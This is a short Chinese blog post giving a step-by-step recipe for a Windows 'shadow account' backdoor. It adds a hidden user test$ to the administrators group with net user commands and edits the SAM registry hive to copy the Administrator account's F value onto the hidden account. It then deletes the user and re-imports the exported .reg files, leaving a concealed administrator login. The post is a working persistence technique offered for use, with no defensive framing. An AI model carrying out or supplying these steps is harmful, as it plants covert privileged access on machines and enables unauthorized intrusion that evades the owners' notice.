1、创建隐藏用户并加入管理员组
net user test$ P@ssw0rd /add
net localgroup administrators test$ /add
2、运行regeditd打开注册表
对HKEY_LOCAL_MACHINE\\SAM\\SAM右键->权限赋予当前用户administrator的具有完全控制和读取权限
创建影子账户
发布时间 2024-01-12 13:30:14作者: msirboss
3、修改注册表内容
重新打开注册表,定位到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
查看administrator对应的键值为1f4和隐藏账户test$的键值为3e8
然后在Users中找到对应数字的F值,将3e8的F值替换为1f4的F值
4、导出注册表内容
将000001F4和000003E8按顺序导出为1.reg、2.reg
5、使用命令行删除隐藏用户
net user test$ /del6、按顺序执行刚才导出的两个reg文件,重新导入
regedit /s 1.reg regedit /s 2.reg